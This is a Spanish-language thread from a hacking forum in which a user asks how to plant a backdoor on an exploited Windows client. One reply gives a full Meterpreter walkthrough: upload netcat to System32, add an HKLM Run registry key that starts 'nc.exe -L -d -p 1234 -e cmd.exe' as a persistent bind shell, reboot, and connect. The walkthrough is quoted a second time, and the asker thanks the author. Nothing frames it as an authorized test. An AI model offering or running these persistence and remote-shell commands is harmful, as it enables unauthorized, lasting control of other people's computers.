Underc0de

Foros Generales => Dudas y pedidos generales => Mensaje iniciado por: Rocky91 en Junio 05, 2013, 01:10:55 PM

Título: [SOLUCIONADO] Subir backdoors a un cliente Windows
Publicado por: Rocky91 en Junio 05, 2013, 01:10:55 PM
Hola a todos.

Tengo una pequeña duda, y es una vez dentro de la maquina a traves de un exploit, ¿a una maquina cliente de Windows, como le subo la backdoors?

A un servidor si es linux o Windows se que lo puedo subir por wget (Linux) ftp o tftp (Windows o linux).

¿Pero cliente Windows?
Título: Re:Subir backdoors a un cliente Windows
Publicado por: Snifer en Junio 06, 2013, 12:09:15 AM
Si lanzas el exploit supongo que lo hiciste desde metasploit, si es el caso revisa sobre los Payload lo cual puedes hacer uso de una shell la cual te dara con una sesion de meterpreter y a ello ya haz volar tu imaginación.

Regards,
Snifer
Título: Re:Subir backdoors a un cliente Windows
Publicado por: Rocky91 en Junio 06, 2013, 04:35:25 AM
No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
Si lanzas el exploit supongo que lo hiciste desde metasploit, si es el caso revisa sobre los Payload lo cual puedes hacer uso de una shell la cual te dara con una sesion de meterpreter y a ello ya haz volar tu imaginación.

Regards,
Snifer

Sí, me lo he imaginao, pero supongo que al cabo de un rato el firewall me echara, o en el caso cuando pase el tiempo, se pondrá el parche a ese agujero de seguridad y no podre volver a acceder.

Saludos
Título: Re:Subir backdoors a un cliente Windows
Publicado por: morodog en Junio 06, 2013, 09:04:11 AM
Te pasteo desde q se abre la sesión con meterpreter:



Meterpreter session 1 opened (192.168.0.2:1934 -> 192.168.0.3:4444)

meterpreter >
Ahora estamos dentro del P.C Remoto, Subamos el Archivo NetCat de nuestra P.C a la P.C Remota, con uso del comando upload. Miremos que opciones tiene esté comando.



meterpreter > upload
Usage: upload [options] [Ubicación Archivo Local] [Ubicación Archivo Remoto]

Uploads local files and directories to the remote machine.

OPTIONS:

-r Upload recursively.

meterpreter > Así:


meterpreter > upload C:\\Windows\\System32\\nc.exe C:\\Windows\\System32\\
uploading : C:\Windows\System32\nc.exe -> C:\Windows\System32\
uploaded : C:\Windows\System32\nc.exe -> C:\Windows\System32\\nc.exe
meterpreter > Despues crearemos una clave dentro del Registro de Windows con la siguiente ruta:


HKLM\\Software\\Microsoft\\Windows\\CurrentVersion \\Run


Asi:



meterpreter > reg setval -k HKLM\\Software\\Microsoft\\Windows\\CurrentVersion \\Run -v Hacked -d 'C:\Windows\System32\nc.exe -L -d -p 1234 -e cmd.exe'
Successful set Hacked.
meterpreter > Ahora solo nos queda reiniciar el P.C remoto con el comando Reboot. Asi:



meterpreter > reboot
Rebooting...
meterpreter >Y por ultimo conectarnos con el BackDoor que acabamos de dejar en la P.C Remota. Podemos usar el Mismos Metasploit o la Consola de Windows. En este caso usaremos el Metasploit. Así:



msf > connect 192.168.0.3 1234
Connected to 192.168.0.3:1234


fuente: shellsecurity
Título: Re:Subir backdoors a un cliente Windows
Publicado por: Rocky91 en Junio 06, 2013, 12:57:31 PM
No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
Te pasteo desde q se abre la sesión con meterpreter:



Meterpreter session 1 opened (192.168.0.2:1934 -> 192.168.0.3:4444)

meterpreter >
Ahora estamos dentro del P.C Remoto, Subamos el Archivo NetCat de nuestra P.C a la P.C Remota, con uso del comando upload. Miremos que opciones tiene esté comando.



meterpreter > upload
Usage: upload [options] [Ubicación Archivo Local] [Ubicación Archivo Remoto]

Uploads local files and directories to the remote machine.

OPTIONS:

-r Upload recursively.

meterpreter > Así:


meterpreter > upload C:\\Windows\\System32\\nc.exe C:\\Windows\\System32\\
uploading : C:\Windows\System32\nc.exe -> C:\Windows\System32\
uploaded : C:\Windows\System32\nc.exe -> C:\Windows\System32\\nc.exe
meterpreter > Despues crearemos una clave dentro del Registro de Windows con la siguiente ruta:


HKLM\\Software\\Microsoft\\Windows\\CurrentVersion \\Run


Asi:



meterpreter > reg setval -k HKLM\\Software\\Microsoft\\Windows\\CurrentVersion \\Run -v Hacked -d 'C:\Windows\System32\nc.exe -L -d -p 1234 -e cmd.exe'
Successful set Hacked.
meterpreter > Ahora solo nos queda reiniciar el P.C remoto con el comando Reboot. Asi:



meterpreter > reboot
Rebooting...
meterpreter >Y por ultimo conectarnos con el BackDoor que acabamos de dejar en la P.C Remota. Podemos usar el Mismos Metasploit o la Consola de Windows. En este caso usaremos el Metasploit. Así:



msf > connect 192.168.0.3 1234
Connected to 192.168.0.3:1234


fuente: shellsecurity


Ooohhhhh he visto la luz :o ¡Gracias! ::) :P

Saludos